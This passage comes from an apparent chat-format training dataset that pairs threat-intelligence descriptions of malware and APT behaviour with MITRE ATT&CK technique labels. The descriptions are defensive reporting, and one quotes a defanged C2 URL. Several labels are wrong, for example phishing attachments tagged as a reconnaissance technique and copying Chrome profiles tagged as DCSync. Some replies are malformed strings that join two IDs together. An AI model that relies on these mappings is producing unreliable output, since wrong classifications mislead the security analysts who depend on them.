- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can collect information about domain groups and members."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 modified legitimate Windows services to install malware backdoors. APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can take screenshots on a compromised host by calling a series of APIs."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "!CMD Trojan executes a command prompt command"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST used DNS for C2 traffic designed to mimic normal SolarWinds API communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the discovered config files contained a URL with an as yet unidentified md5: hxxps://46.165.222(dot)28/upgrade/bf0dac805798cc1f633f19ce8ed6382f/upgrade.php Victim set #4 A set of victims discovered installed Siemens SCADA software in their ICS environment was responsible for downloading and executing BlackEnergy"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has maintained persistence using the startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sent malicious attachments to victims over email, including an Excel spreadsheet containing macros to download Pupy."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can use a stream cipher to decrypt stings used by the malware."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell hooks several API functions to spawn system threads."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy has a module to inject a PE binary into a remote process."
- },
- {
- "role": "assistant",
- "content": "T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to delete files and directories on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hcdLoader provides command-line access to the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has the ability to query device information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather information on the victim username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can take a desktop screenshot and save the file into \\ProgramData\\Mail\\MailAg\\shot.png."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor accomplished this by using administrative accounts to connect via SMB to targeted users, and then copy their Chrome profile directories as well as data protection API (DPAPI) data"
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The organizational backup server was among the first targeted. When Ryuk was detected and stopped on the backup server, the attackers used the icacls command to modify access control, giving them full control of all the system folders on the server"
- },
- {
- "role": "assistant",
- "content": "T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has signed code with self-signed certificates."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the certutil command to decode a payload file."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These encrypted blobs are dropped to C:\\Users\\user\\AppData\\Local\\Temp\\3f34a.tmp one after the other. Once they are dropped, the dropper also decrypts them and writes them to a newly created folder and creates persistence"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can collect data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses run keys for persistence on Windows"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve lists of files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We saw a Waterbear loader named \"ociw32.dll\" inside one of the folders in the %PATH% environmental variable. This DLL name is hardcoded inside \"mtxoci.dll\" which is loaded by the MSDTC service during boot-up. mtxoci.dll” first tries to query the registry key \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\" to see if the value \"OracleOciLib\" exists. If so, it retrieves the data inside it and loads the corresponding library. If the value doesn't exist, “mtxoci.dll” tries to load \"ociw32.dll\" instead. During our investigation, we noticed that the value \"OracleOciLib\" was deleted from the victim's machine, as shown in Figure 2. Hence, the malicious loader \"ociw32.dll\" was loaded and successfully executed on the host"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard searches for credential files on the host, as well as queries metadata for cloud-specific credentials"
- },
- {
- "role": "assistant",
- "content": "T1552.005 - Unsecured Credentials: Cloud Instance Metadata API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL is capable of setting and deleting Registry values."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has compromised websites to redirect traffic and to host exploit kits."
- },
- {
- "role": "assistant",
- "content": "T1608.004 - Drive-by Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Nefilim ransomware creates a DirectInput object using the DirectDrawCreateEx function to capture keystrokes. Keylogging is both a Credential Access and Collection tactic."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser has used HTTP and HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": " this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image."
- },
- {
- "role": "assistant",
- "content": "T1137.001 - Office Application Startup: Office Template Macros.', 'T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates over HTTP or HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse."
- },
- {
- "role": "assistant",
- "content": "T1137.004 - Office Application Startup: Outlook Home Page"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater can disable the system's local proxy settings."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following are the three files: Defender.sct – The malicious JavaScript based scriptlet file"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the past, Emissary Panda has used many ways to target their victims, with the most notable being the exploits from the Hacking Team leak. Usually, the delivered payload is either the well-known ‘PlugX’ or ‘HttpBrowser’ RAT, a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRAT uses a batch file to kill a security program task and then attempts to remove itself."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware’s tasks. The strings are decrypted using a key that combined the size and raw address of the .bss section, as well as the ransomware’s compilation timestamp"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Amadey has modified the `:Zone.Identifier` in the ADS area to zero."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail has the ability to enumerate the users home directory and the path to its own application bundle."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has used a polymorphic decryptor to decrypt itself at runtime."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware will then write a base64 encoded PowerShell script (which is contained in xmlparse.dll as a resource) to \\%TEMP%\\enu1.ps1 and execute it. The script, intended for reconnaissance purposes, checks if a machine is part of a domain and if the user has Admin privileges or is part of the Admin Group"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. Hadoop’s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message"
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A BlackEnergy 2 plug-in uses WMI to gather victim host details."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat is capable of downloading files from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has been disguised as legitimate 360 Total Security Antivirus and OpenVPN programs."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito's installer uses WMI to search for antivirus display names."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "modifies the %regrun% Registry to point itself to an autostart mechanism."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has staged tools, including gsecdump and WCE, on previously compromised websites."
- },
- {
- "role": "assistant",
- "content": "T1608.002 - Upload Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can use VBScript to execute malicious code."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea contains a cleanup module that removes traces of itself from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary."
- },
- {
- "role": "assistant",
- "content": "T1565.002 - Transmitted Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can send C2 communications with XOR encryption."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke can securely delete files, including deleting itself from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some of the instances used in this script are: $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x' ($ENV:cOMsPEC[4,26,25]-jOin'') XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of creating a remote Bash shell and executing commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used C:\\Windows\\Debug and C:\\Perflogs as staging directories."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can take screen shots of a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer uses API calls to enumerate the infected system's ARP table."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - RarStar — This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. RarStar HTTP POST request. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot exfiltrates data over its C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Loader Trojan The payload dropped to the system by the macro is an executable that is responsible for installing and executing a dynamic link library (DLL) to the system. The loader has several coding features that make it interesting. Upon execution, the loader will decrypt the embedded payload (DLL) using a custom algorithm followed by decompressing it using the RtlDecompressBuffer API. This API is normally used for Windows drivers, but there is nothing to prevent a userland process from using it, and the parameters are documented on MSDN. The compression algorithm used is LZNT1 with maximum compression level. The payload is decrypted using a starting 10-byte XOR key of: 0x3950BE2CD37B2C7CCBF8. The payload is in the loader at file offset: 0x19880 - 0x1F23C size of 0x59BD. The payload can be decrypted and decompressed with the following Python script"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses cloud based services for C2."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
